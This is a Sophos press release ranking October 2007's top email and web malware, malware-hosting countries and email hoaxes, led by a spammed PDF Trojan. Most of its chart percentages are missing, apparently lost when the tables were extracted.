PDF malware crashes into October 2007's top virus charts

Sophos Press Release

Malicious PDF files accounted for up to two thirds of infected email in three day spam campaign

IT security and control firm Sophos has revealed the most prevalent malware threats and countries causing problems for computer users around the world during October 2007.

The study, compiled by Sophos's global network of monitoring stations, has shown that a new Trojan horse, PDFex, that is typically spammed out in email messages with an infected Adobe Acrobat PDF attachment, has smashed its way into third position in the chart. The Trojan was widely spammed out in an attack during the last few days of October, taking advantage of an unpatched Windows vulnerability to infect innocent PCs.

"PDFex only started to circulate at the very end of the month, but still managed to account for over 13 percent of all emailed malware during October. It was heavily spammed out between 26-28th October, and during that period, it accounted for a staggering two thirds, or 66 percent, of all malware spread via email," said Carole Theriault, senior security consultant at Sophos. "PDFs have long been used in business as a means of sharing information, so the social engineering trickery of using a PDF puts insufficiently protected businesses at risk. Adobe have issued an update to their Acrobat software that fixes the problem, and eyes are now turned to Microsoft to patch the underlying flaw in Windows which could also affect other vulnerable applications such as Skype and Firefox."

Top ten email threats

The top ten list of email-based malware threats in October 2007 reads as follows:

Position Last
Malware Percentage of reports
1 2 Troj/Pushdo
2 1 W32/Netsky
3 New Troj/PDFex
4 4 W32/Zafi
5 3 W32/Mytob
6 5 Mal/IFrame
7 Re-entry Troj/Dloadr
8 7 W32/MyDoom
9 10 W32/Traxg
10 8 Mal/Dropper
Others 7.4%

Although criminals are currently using PDF files to try and infect innocent PCs with malware, SophosLabs has seen little evidence of more spammers continuing to use PDF files to get their unwanted marketing messages in front of computer users.

Sophos's research also indicates a slight decrease in the percentage of infected email. Overall in October, 0.1 percent of emails were carrying malicious email attachments, or one in every 1,000, compared to 1 in every 833 during September.

Top ten web threats

Web attacks continue to pose a significant threat, with Mal/Iframe being responsible for almost seven out of every ten infections found on the web by Sophos. During October, Sophos detected an average of 5,200 new compromised webpages hosting malicious code each day, a similar figure to last month.

The top ten list of web-based malware threats in October 2007 reads as follows:

Position Last
Malware Percentage of reports
1 1 Mal/IFrame
2 New Troj/Unif
3 2 Mal/ObfJS
4 4 Troj/Fujif
5= 3 Troj/Decdec
5= New Troj/Zlobar
6 8 Mal/Packer
7 7 Troj/Psyme
8= New Troj/Rectoun
8= New Troj/Spywad
Others 3.5%

Troj/Unif is a new entry at number two this month, accounting for 15 percent of all infected webpages. It was used by hackers in a number of coordinated attacks during October, where legitimate webpages were compromised and visitors were subsequently redirected to a series of attack sites, hosted in countries all over the world, from Turkey to Malaysia.

Top malware-hosting countries

The top ten list of countries hosting malware-infected webpages in October 2007 reads as follows:

Position Last
Country Percentage of reports
1 1 China (inc. HK)
2 3 Russia
3 2 United States
4 4 Ukraine
5 6= Netherlands
6 7= Canada
7 New Argentina
8 Re-entry South Korea
9 5 Germany
10 New Singapore
Others 6.3%

China continues to hold the top position and was responsible for hosting more than half of all the infected webpages detected by Sophos during October. Significantly, Russia and the US have swapped places this month. Russia was responsible for hosting a fifth of infected webpages in October, more than five percent more than September, while the US continues to decrease its impact. The US now hosts less than 15 percent of malicious pages served up on the internet, whereas six months ago, it accounted for double that.

The Ukraine and Netherlands, this month holding the fourth and fifth positions, hosted a surprising amount of infected webpages in October considering their populations and number of PCs. Despite the fact that these two countries were responsible for hosting less than three percent of infected webpages between them, the sheer volume of pages being infected worldwide on a daily basis means that even a tiny percentage equates to a significant amount of malware.

"In October, we saw a large Dutch domain attacked by Mal/ObfJS. With the infection spreading to all the pages the domain served up, it significantly impacted the Netherlands' position in the chart. As the domain has now cleaned up the infection, we hope that the country will be able to slip out of Sophos's next top ten list. This should be a wake-up call to other web providers to ensure they have the right protection and up-to-date patches in place to stop a potential infection in its tracks," concluded Theriault.

Top ten hoaxes and scams

The top ten list of email hoaxes and scams in October 2007 reads as follows:

Position Hoax Percentage of reports
1 Parcel Delivery Service scam
2 Olympic torch
3 Hotmail hoax
4 A virtual card for you
5 Music Top 50
6 Bonsai kitten
7 Bill Gates fortune
8 MSN is closing down
9 Welcome to the Matrix
10 Meninas da Playboy
Others 61.7%

Sophos experts have compiled simple best practice guides to adopting a multi-layered defense. With blended threats, spam and phishing attacks on the rise it has never been more important to educate end users about how best to protect themselves.

Sophos recommends companies protect themselves with a consolidated solution which can control network access and defend against the threats of spam, hackers, spyware and viruses.

More than 100 million users in 150 countries rely on Sophos’ complete security solutions as the best protection against complex threats and data loss. Simple to deploy, manage, and use, Sophos’ award-winning encryption, endpoint security, web, email, mobile and network security solutions are backed by SophosLabs - a global network of threat intelligence centers. Sophos is headquartered in Oxford, U.K., and is publicly traded on the London Stock Exchange under the symbol “SOPH.” More information is available at www.sophos.com/company.